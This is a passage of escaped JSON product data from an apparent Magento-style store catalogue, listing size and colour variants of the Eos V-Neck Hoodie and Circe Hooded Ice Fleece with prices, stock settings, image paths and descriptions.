onfigurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1145\":{\"sku\":\"WH11-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-XL-Green\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1146\":{\"sku\":\"WH11-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie-XL-Orange\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"eos-v-neck-hoodie-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1147\":{\"sku\":\"WH11\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Eos V-Neck Hoodie\",\"description\":\"<p>Getting chilly before class starts? Wear the Eos on your way to and from yoga for a cute and cozy warmup piece. Reach for its reliable comfort and enjoy a super-soft blend of fabrics finished in sporty style that includes a hidden kangaroo pocket.<\\/p>\\n<p>Semi-fitted. <br \\/>Long-Sleeve. <br \\/>Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"54\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Pullover|Sweatshirt,material=Fleece|Polyester|Spandex,pattern=Solid,climate=Cool|Indoor|Mild,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH11-XS-Blue,size=XS,color=Blue|sku=WH11-XS-Green,size=XS,color=Green|sku=WH11-XS-Orange,size=XS,color=Orange|sku=WH11-S-Blue,size=S,color=Blue|sku=WH11-S-Green,size=S,color=Green|sku=WH11-S-Orange,size=S,color=Orange|sku=WH11-M-Blue,size=M,color=Blue|sku=WH11-M-Green,size=M,color=Green|sku=WH11-M-Orange,size=M,color=Orange|sku=WH11-L-Blue,size=L,color=Blue|sku=WH11-L-Green,size=L,color=Green|sku=WH11-L-Orange,size=L,color=Orange|sku=WH11-XL-Blue,size=XL,color=Blue|sku=WH11-XL-Green,size=XL,color=Green|sku=WH11-XL-Orange,size=XL,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Pullover|Sweatshirt\",\"material\":\"Fleece|Polyester|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Cool|Indoor|Mild\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"1148\":{\"sku\":\"WH12-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-XS-Gray\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},\"1149\":{\"sku\":\"WH12-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-XS-Green\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1150\":{\"sku\":\"WH12-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-XS-Purple\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1151\":{\"sku\":\"WH12-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-S-Gray\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"1152\":{\"sku\":\"WH12-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-S-Green\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1153\":{\"sku\":\"WH12-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-S-Purple\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine 